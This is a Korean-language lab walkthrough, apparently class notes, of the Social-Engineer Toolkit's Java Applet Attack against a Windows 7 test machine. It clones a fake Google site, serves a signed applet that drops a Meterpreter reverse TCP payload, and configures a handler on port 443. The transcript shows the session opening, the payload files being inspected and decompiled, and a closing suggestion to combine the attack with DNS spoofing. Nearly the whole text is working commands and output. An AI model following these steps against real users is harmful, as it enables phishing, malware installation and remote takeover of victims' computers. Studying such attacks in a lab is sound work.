metasploit 16. Java Applet Attack

SE Tool Kit 실행(Fake Google WEB Site 구성) - Java Applet Attack(악성 프로그램 유포)

(KarlLinux)

# setoolkit 

Select from the menu:

 

1) Social-Engineering Attacks

2) Fast-Track Penetration Testing

3) Third Party Modules

4) Update the Metasploit Framework

5) Update the Social-Engineer Toolkit

5) Update SET configuration

6) Help, Credits, and About

 

99) Exit the Social-Engineer Toolkit

 

set> 1

Select from the menu:

 

1) Spear-Phishing Attack Vectors

2) Website Attack Vectors

3) Infectious Media Generator

4) Create a Payload and Listener

5) Mass Mailer Attack

6) Arduino-Based Attack Vector

7) SMS Spoofing Attack Vector

8) Wireless Access Point Attack Vector

9) QRCode Generator Attack Vector

10) Powershell Attack Vectors

11) Third Party Modules

 

99) Return back to the main menu.

 

set> 2

1) Java Applet Attack Method

2) Metasploit Browser Exploit Method

3) Credential Harvester Attack Method

4) Tabnabbing Attack Method

5) Web Jacking Attack Method

6) Multi-Attack Web Method

7) Full Screen Attack Method

8) HTA Attack Method

99) Return to Main Menu

 

set:webattack> 1

 

1) Web Templates

2) Site Cloner

3) Custom Import

 

99) Return to Webattack Menu

 

set:webattack>1

[-] NAT/Port Forwarding can be used in the cases where your SET machine is

[-] not externally exposed and may be a different IP address than your reverse listener.

set> Are you using NAT/Port Forwarding [yes|no]: no

[-] Enter the IP address of your interface IP or if your using an external IP, what

[-] will be used for the connection back and to house the web server (your interface address)

set:webattack> IP address or hostname for the reverse connection: 192.168.20.50

Select which option you want:

 

1. Make my own self-signed certificate applet.

2. Use the applet built into SET.         applet built 자동

3. I have my own code signing certificate or applet.

 

Enter the number you want to use [1-3]: 2

[*] Okay! Using the one built into SET - be careful, self signed isn't accepted in newer versions of Java :(

 

1. Java Required

2. Google

3. Facebook

4. Twitter

5. Yahoo

 

set:webattack> Select a template:2

Name: Description:

 

1) Meterpreter Memory Injection (DEFAULT) This will drop a meterpreter payload through PyInjector

2) Meterpreter Multi-Memory Injection This will drop multiple Metasploit payloads via memory

3) SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET

4) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support

5) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP

6) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec

7) Import your own executable Specify a path for your own executable

 

set:payloads> 1   meterpreter 기본 방식

set:payloads> PORT of the listener [443]: <ENTER>     443포트는 중간에서 차단하지 않는다. 클라이언트가 웹을 하기 위함

 

Select the payload you want to deliver via shellcode injection

 

1) Windows Meterpreter Reverse TCP

2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager

3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager

4) Windows Meterpreter (ALL PORTS) Reverse TCP

 

set:payloads> Enter the number for the payload [meterpreter_reverse_tcp]: 1

[*] Processing /root/.set/meta_config for ERB directives.

resource (/root/.set/meta_config)> use exploit/multi/handler

resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

resource (/root/.set/meta_config)> set LHOST 192.168.20.50

LHOST => 192.168.20.50

resource (/root/.set/meta_config)> set LPORT 443

LPORT => 443

resource (/root/.set/meta_config)> set EnableStageEncoding false

EnableStageEncoding => false

resource (/root/.set/meta_config)> set ExitOnSession false

ExitOnSession => false

resource (/root/.set/meta_config)> exploit -j

...

[*] Started reverse handler on 192.168.20.50:443

[*] Starting the payload handler...

msf exploit(handler) > 

(windows 7)

 

⑥ 윈도우 7에서 브라우저를 통해 192.168.20.50 웹서버에 접속

 

(참고) 만약 java 설치가 되어 있지 않다면 아래 사이트를 통해 설치한다.

- https://java.com/ko/

 

(선수작업)

시작 > 모든 프로그램 > Java > Java 구성 > "보안" 탭 > [ V ] 높음

예외 사항 사이트 목록 > 사이트 목록 편집 > 추가 > "http://192.168.20.50"

Mozilla Firefox 브라우저를 사용한다.

http://192.168.20.50/

-> Java Selevet download 한다.

-> www.google.com 사이트로 포워딩 된다.

칼리리눅스에서 연결된 세션(Reverse TCP Session)에 대해 확인

(KaliLinux)

..... (중략) .....   [*] Exploit running as background job.   [*] Started reverse handler on 192.168.20.50:443 [*] Starting the payload handler... msf exploit(handler) > [*] Sending stage (957487 bytes) to 192.168.20.201 [*] Meterpreter session 1 opened (192.168.20.50:443 -> 192.168.20.201:49317) at 2016-01-09 03:40:46 +0900 <ENTER> msf exploit(handler) > sessions -l   Active sessions ===============   Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 WIN7\soldesk @ WIN7 192.168.20.50:443 -> 192.168.20.201:49317 (192.168.20.201)   msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1...   meterpreter > sysinfo Computer : SOLDESK-PC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 (Current Process is WOW64) System Language : ko_KR Meterpreter : x86/win32   meterpreter > quit [*] Shutting down Meterpreter...   [*] 192.168.20.202 - Meterpreter session 1 closed. Reason: User exit msf exploit(handler) > quit [*] Everything has been moved over to Apache and is ready to go.   Press <return> to continue <ENTER>   set:webattack>99 set> 99 set> 99

# cd /var/www/html

# ls

1vHuSK.jar DjWZVG0 index.html msf.exe

 

# file *

1vHuSK.jar: Zip archive data, at least v2.0 to extract DjWZVG0: PE32 executable (console) Intel 80386, for MS Windows index.html: HTML document, UTF-8 Unicode text, with very long lines msf.exe: PE32 executable (console) Intel 80386, for MS Windows

 

[참고] jar 명령어 사용법(The Java Archive Tool)

# jar cvf file.jar file1 file2 file3  c: create, v: verbose, f: file 

# jar tvf file.jar  t: content 

# jar xvf file.jar  x: extract 

 

# jar tvf 1vHuSK.jar

237 Thu Oct 15 08:00:10 KST 2015 META-INF/MANIFEST.MF 255 Thu Oct 15 08:00:10 KST 2015 META-INF/SIGNAPPL.SF 1114 Thu Oct 15 08:00:10 KST 2015 META-INF/SIGNAPPL.DSA 0 Thu Oct 15 08:00:08 KST 2015 META-INF/ 5881 Thu Oct 15 08:00:08 KST 2015 Java.class

 

# jar xvf 1vHuSK.jar

-> 출력 내용 생략

 

# ls

1vHuSK.jar DjWZVG0 Java.class META-INF index.html msf.exe

 

# file *

1vHuSK.jar: Zip archive data, at least v2.0 to extract DjWZVG0: PE32 executable (console) Intel 80386, for MS Windows Java.class: compiled Java class data, version 50.0 (Java 1.6) Java.jad: ASCII text META-INF: directory index.html: HTML document, UTF-8 Unicode text, with very long lines msf.exe: PE32 executable (console) Intel 80386, for MS Windows

 

# cat Java.class

-> compliled java class 파일이므로 정상적으로 보이지는 않는다.

[참고] 용어: complie/decompile  

ls.c(ASCII) ----compile--->ls(binary) 운영체제 커널이 바로 읽어들일수 있게 전환

ls(binary) ----decompile--->ls.c(ASCII) 

C언어를 제외한 나머지 고급언어들로 만든 ~.exe 파일을 디컴파일 하면

원래 소스코드를 볼 수 있다. 

 

# jad Java.class  jad : Java Decompiler 

Parsing Java.class...The class file version is 50.0 (only 45.3, 46.0 and 47.0 are supported) Generating Java.jad Overlapped try statements detected. Not all exception handlers will be resolved in the method init Couldn't fully decompile method init Couldn't resolve all exception handlers in method init Couldn't fully decompile method m Couldn't fully decompile method <init>

 

# cat java.jad   자바로 만들어진 Java.class의 디컴파일된 소스코드 파일

// Decompiled by Jad v1.5.8e. Copyright 2001 Pavel Kouznetsov. // Jad home page: http://www.geocities.com/kpdus/jad.html // Decompiler options: packimports(3) // Source File Name: v   import java.applet.Applet; import java.applet.AppletContext; import java.io.*; import java.net.URL; import java.net.URLConnection; import java.util.Random; import sun.misc.BASE64Decoder;   public class Java extends Applet {   public void init() { Random random; Object obj1; String s; String s1; Object obj2; Object obj3; ..... (중략) .....

 

 

[참고] 파일 백업

# cd /var/www/html

# tar cvzf /backup/FakeWEB2.tar.gz .

 

(정리)

(실습1) Fake Site 구성(EX: google site)

-> (목적) ID/PASS 수집

(실습2) Fake Site 구성(EX: google site)

-> (목적) 악성 프로그램 설치(백도어)

 

(클라이언트) windows7

http://192.168.20.50

DNS Spoofing 과 같이 사용하여 주소를 IP형식이 아닌 도메인 형식으로 사용하여 공격할 수 있게 한다.